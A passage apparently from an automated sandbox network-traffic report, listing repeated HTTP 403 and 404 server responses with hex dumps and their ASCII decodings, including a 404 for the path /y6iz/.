87 20 d8 a7 d8 b3 d8 aa 2e 20 db 8c da a9 d8 a8 d8 a7 d8 b1 20 d8 af db 8c da af d8 b1 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:02:10 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:02:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:02:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:02:18 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16026X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:12:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:12:24 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:12:27 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 10:12:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>
